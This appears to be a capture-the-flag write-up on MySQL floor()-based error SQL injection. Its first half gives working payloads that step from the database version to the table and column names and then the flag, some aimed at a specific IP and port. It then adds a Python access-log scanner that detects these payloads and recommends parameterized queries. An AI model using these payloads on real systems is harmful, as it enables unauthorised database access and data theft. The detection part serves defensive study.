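Summary of floor() error-based injection
This is really a double-query injection.
The payload built from these functions uses two SELECT queries.
Template:
?id=1 and 1=2 union select 1 from (select+count(*),concat(floor(rand(0)*2),(test statement))a from information_schema.tables group by a)b
Get the current database version: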
?id=1 and 1=2 union select 1 from (select+count(*),concat(floor(rand(0)*2),version())a from information_schema.tables group by a)b
Get the database name:
?id=1 and 1=2 union select 1 from (select+count(*),concat(floor(rand(0)*2),database())a from information_schema.tables group by a)b
Query a table name:
http://222.18.158.243:4606/?id=1 and 1=2 union select 1 from (select+count(*),concat(floor(rand(0)*2),(select table_name from information_schema.tables where table_schema=database() limit 1,1))a from information_schema.tables group by a)b
Query a column name:
http://222.18.158.243:4606/?id=1 and 1=2 union select 1 from (select+count(*),concat(floor(rand(0)*2),(select column_name from information_schema.columns where table_name='flag' limit 0,1))a from information_schema.tables group by a)b
Query the column contents:
http://222.18.158.243:4606/?id=1 and 1=2 union select 1 from (select+count(*),concat(floor(rand(0)*2),(select flag from flag))a from information_schema.tables group by a)b
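
Every template above shares three parts: floor(rand(0)*2), count(*) and group by. As an added example (not from the original page), this Python check flags access-log requests whose decoded target carries all three. The log format, the sample lines and the names scan, indicators and SAMPLE_LOG are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# The three parts every template on this page shares.
INDICATORS = {
    "floor_rand": re.compile(r"floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\)"),
    "count_star": re.compile(r"count\s*\(\s*\*\s*\)"),
    "group_by": re.compile(r"\bgroup\s+by\b"),
}
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (.*) HTTP/[\d.]+"')

def normalize(target: str) -> str:
    """URL-decode ('+' and %20 become spaces), collapse whitespace, lowercase."""
    for _ in range(3):  # proxies sometimes re-encode, so decode until stable
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return re.sub(r"\s+", " ", target).lower()

def indicators(target: str) -> set:
    """Names of the indicator patterns found in one request target."""
    text = normalize(target)
    return {name for name, rx in INDICATORS.items() if rx.search(text)}

def scan(log_lines):
    """Return (client, verdict) per parsable line; all three parts = a hit."""
    results = []
    for line in log_lines:
        m = REQUEST.match(line)
        if not m:
            continue
        found = indicators(m.group(2))
        verdict = "floor-error-injection" if len(found) == 3 else (
            "review" if "floor_rand" in found else "clean")
        results.append((m.group(1), verdict))
    return results

# Constructed sample access-log lines (documentation-range IPs, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /?id=1 HTTP/1.1" 200 512',
    '198.51.100.23 - - [01/Jan/2024:10:00:05 +0000] "GET /?id=1%20and%201=2%20union%20select%201%20from%20(select+count(*),concat(floor(rand(0)*2),version())a%20from%20information_schema.tables%20group%20by%20a)b HTTP/1.1" 200 97',
    '198.51.100.23 - - [01/Jan/2024:10:00:09 +0000] "GET /?id=1%20AND%201=2%20UNION%20SELECT%201%20FROM%20(SELECT+COUNT(*),CONCAT(FLOOR(RAND(0)*2),DATABASE())a%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20a)b HTTP/1.1" 200 97',
    '203.0.113.40 - - [01/Jan/2024:10:01:00 +0000] "GET /search?q=ground+floor+group+by+price HTTP/1.1" 200 2048',
    '198.51.100.9 - - [01/Jan/2024:10:02:00 +0000] "GET /?id=1%20and%20floor(rand(0)*2) HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

A hit in the logs shows the parameter reaches the SQL text unescaped; the fix is a parameterized query for id, with the log check as a backstop.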